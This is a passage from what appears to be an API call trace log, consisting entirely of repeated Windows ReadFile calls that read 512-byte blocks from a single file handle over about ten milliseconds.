nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.755] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.756] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.757] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.758] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.760] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.761] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.762] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.763] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.764] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, 